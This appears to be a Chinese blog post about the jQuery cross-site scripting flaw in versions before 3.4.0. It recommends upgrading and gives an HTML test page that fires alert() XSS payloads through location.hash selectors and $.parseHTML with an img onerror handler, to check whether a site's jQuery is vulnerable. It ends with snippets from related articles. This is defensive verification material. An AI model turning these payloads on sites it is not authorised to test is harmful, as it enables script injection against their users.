JQuery跨站脚本漏洞

已于 2024-04-02 15:59:25 修改
阅读量4k 收藏 9
点赞数 13
文章标签: jquery 前端 javascript
于 2024-04-02 15:55:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq274575499/article/details/137272214
版权

漏洞描述:

jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。

jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。

危害级别:

解决方案:更新jQuery到最新版本:如果是由于jQuery的旧版本中存在漏洞,那么升级到最新版本可以修复这个问题。

漏洞验证:

1、使用Dude Suite访问目标站点,数据监视栏得到jQuery版本。

2、使用如下验证代码,保存为html格式。需要修改第9行,src="http://你的URL:端口号/Scripts/jquery-1.8.2.min.js"中“你的URL:端口号”为要测试的url,修改"jquery-1.8.2.min.js"为自己要验证的js版本。

<!DOCTYPE html>
<html lang="zh">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Jquery XSS</title>
    <script type="text/javascript" src="http://你的URL:端口号/Scripts/jquery-1.8.2.min.js"></script>
    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> -->
    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> -->
    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> -->
    <script>
        $(function () {
            // #9521
            // #11290
            $(location.hash);

            // #11974
            $('#bug').on('click', function () {
                $.parseHTML("<img src='z' onerror='alert(\"bug-11974\")'>");
                return false;
            });
        })
    </script>
</head>

<body>
    <h1>jQuery with XSS</h1>
    <h2>Demo:</h2>
    <p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p>
    <ul>
        <li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <a
                href="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li>
        <li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <a
                href="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li>
        <li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974"
                target="_blank">ticket</a></li>
    </ul>
    <h2>Test version:</h2>
    <ul>
        <li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li>
    </ul>
    <h2>Safe version:</h2>
    <ul>
        <li>1.12.0, 1.12.1 </li>
        <li>2.2.0, 2.2.1</li>
        <li>3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.2.1, 3.3.0, 3.3.1, 3.4.0, 3.4.1, 3.5.0, 3.5.1</li>
    </ul>
</body>

</html>

3、保存上面代码后用浏览器打开。

可以看到Demo下面有三个bug-*

4、验证:可以依次点击这三个bug-9521 bug-11290 bug-11974,看看哪个会弹窗,我这里是 jQuery v1.8.2 的版本,在点击 bug-11974 发生了弹窗,说明此版本的漏洞被验证成功了。

5、也可以点击页面中的 test version下的 test result,来判断自己版本的 jQuery 版本存在的 bug 编号,例如这里的 jQuery v2.1.4 版本就对应着bug-2432和 bug-11974。

JQuery跨站脚本漏洞与防范方法
SVIPCODE的博客
08-14 1909
跨站脚本漏洞是一种常见的Web安全问题,但通过对用户输入进行验证、过滤和转义处理,我们可以有效地减少这类漏洞的风险。对于用户输入的数据,开发者应该进行充分的验证和过滤,确保输入的安全性。然而,这些方法默认会对输入的内容进行解析和渲染,如果未对用户输入进行适当过滤和转义,攻击者就可以通过插入恶意代码来利用这些操作。除了进行输入验证和过滤外,还可以对用户输入进行转义处理,将特殊字符转换为其等价的HTML实体,从而防止注入攻击。同样地,如果用户输入了恶意代码,那么该代码就会被解析和执行,引发跨站脚本漏洞
主机扫漏:jQuery 跨站脚本漏洞修复建议 | 升级tomcat服务解决Apache Tomcat 环境问题漏洞(CVE-2023-46589)【安装多个tomcat服务】
专注于计算机研发知识和资讯分享
05-13 1590
目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr。Apache Tomcat存在环境问题漏洞,该漏洞源于存在不正确的输入验证漏洞,可能会导致将单个请求视为多个请求,从而在反向代理后面出现请求走私。
jQuery最新xss漏洞浅析、复现、修复
最新发布
m0_59598029的博客
03-20 745
形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。危害:一旦注入恶意脚本后,攻击者就能够执行各种恶意活动。攻击者可能将私有信息(例如可能包含会话信息的 cookie)从受害者的机器传输给攻击者。攻击者可能以受害者的身份将恶意请求发送到Web 站点,如果受害者具有管理该站点的管理员特权,这可能对站点尤其危险。
漏洞笔记】jQuery跨站脚本
TeamsSix 的 优快云 空间
11-20 2232
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
jQuery跨站脚本漏洞
weixin_50464560的博客
08-21 2359
原理:     jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响版本:     jquery-1.7.1~1.8.3    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min...
JavaScript 常见安全漏洞及自动化检测技术(转自IBM技术博客)
weixin_34384681的博客
12-18 781
2019独角兽企业重金招聘Python工程师标准>>> ...
jQuery导致的XSS跨站漏洞
weixin_45908624的博客
11-17 5884
jQuery导致的XSS跨站漏洞
jQuery 跨站脚本漏洞
weixin_30664051的博客
03-13 1267
漏洞名称: jQuery 跨站脚本漏洞 CNNVD编号: CNNVD-201303-203 发布时间: 2013-03-12 更新时间: 2013-03-12 危害等级: 漏洞类型: 跨站脚本 威胁类型: 远程 CVE编号: CVE-2011-4969 ...
跨站脚本漏洞(XSS)示例
04-15
NULL 博文链接:https://songjianyong.iteye.com/blog/1754973
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
概述 根据国外媒体的最新报道,谷歌公司的安全工程师Eduardo Vela在jQuery Mobile框架中发现了一个安全漏洞,这个漏洞将会让 所有使用了jQuery Mobile的网站暴露于跨站脚本攻击风险之下 。 jQuery Mobile项目(jQuery框架中的一个组件)是一个基于HTML5的开发框架,在它的帮助下,开发者可以设计出能够适配目前主流移动设备和桌面系统的响应式Web站点以及应用程序。实际上,jQuery Mobile不仅可以为主流移动平台提供jQuery的核心库,而且它也是一个较为完整统一的jQuery移动UI框架。根据jQuery开发团队的介绍,目前全球范围内大约有十五
jquery跨站脚本漏洞
09-02
jQuery跨站脚本漏洞主要是由于其在处理用户输入时,没有充分验证用户输入的安全性。 这种漏洞的利用方式大致分为两种:一种是对用户输入的数据进行恶意修改,然后以用户的身份执行一些不被授权的操作;另一种是...
使用jQuery防范跨站脚本攻击
2301_79331328的博客
09-18 607
保持对最新安全威胁和漏洞的了解,并及时采取相应的防御措施,是确保网站和用户数据安全的关键。跨站脚本攻击是Web安全中的一个重要问题,但我们可以使用jQuery来有效地防御这种类型的攻击。通过HTML编码、移除危险标签以及使用安全的jQuery插件,我们可以增强网站的安全性,保护用户的隐私和数据安全。除了进行HTML编码,还可以移除用户输入中的危险HTML标签,从而有效地防止跨站脚本攻击。在本文中,我们将介绍一些常见的跨站脚本攻击方式,并展示如何使用jQuery进行有效的防御。变量包含一个恶意的脚本代码。
跨站脚本攻击漏洞
Zxdwr520的博客
07-30 511
漏洞描述:由于系统没有对漏洞参数进行任何的特殊符号以及敏感字符串的过滤而导致的 如在输入框中输入:<script type="text/javascript">alert(1);</script> 会弹框显示1 解决办法: 对输入框输入的value值进行过滤特殊字符,这样在用户输入特殊字符后会自动清除掉 function stringFilterChart(str) { var pattern = new RegExp("[`~!@#$^&*=|{}...
jQuery跨站脚本漏洞XSS with $(location.hash)漏洞
weixin_34090643的博客
12-01 4728
jquery下载地址:https://code.jquery.com/jquery/ 影响范围:版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞已测试成功版本:jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.jsjquery-...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值